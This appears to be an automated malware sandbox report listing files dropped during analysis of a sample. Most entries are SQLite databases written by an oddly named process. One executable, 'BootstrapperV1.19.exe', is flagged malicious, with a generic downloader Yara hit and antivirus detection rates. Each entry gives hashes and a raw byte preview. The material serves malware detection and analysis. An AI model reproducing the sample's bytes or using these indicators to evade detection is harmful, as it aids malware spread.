                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\BootstrapperV1.19.exe
                                                    File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):995840
                                                    Entropy (8bit):5.630174987352983
                                                    Encrypted:false
                                                    SSDEEP:24576:DIbp4sZotkNjFC/4qxp+k+kPFoHZvPrSMc:cvotkNjg/lhqZvG
                                                    MD5:90FD25CED85FE6DB28D21AE7D1F02E2C
                                                    SHA1:E27EFF4CD4D383F5C564CCE2BD1AAA2FFE4EC056
                                                    SHA-256:97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F
                                                    SHA-512:1C775CF8DFDE037EAA98EB14088C70D74923F0F6A83030A71F2F4C1A4453F6154DAB7A4AA175E429860BADDA3E5E0AE226F3C3E8171332F5962BF36F8AA073FA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...an.f.........."......(..........rF... ....@...... ....................................`..................................................F..T....`..u............................................................................F............... ..H............text....&... ...(.................. ..`.rsrc...u....`.......*..............@..@.reloc...............0..............@..BH........P..\............................................................0*...........(....r...p(....s......r...po.....sq......o.....ow...o....r...po....9,....ow...rD..poj.....9.....rp..pr|..po2..............9.....o..........&......r|..p.....s........o......r~..p~....r...p(....o......r...po.............9......o..........&..........:......r|..p(....98....s........r...po.............9......o..........&........r...p(....9....r...p(......(....9....r...p..(....s........o......r~..p~....r.
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
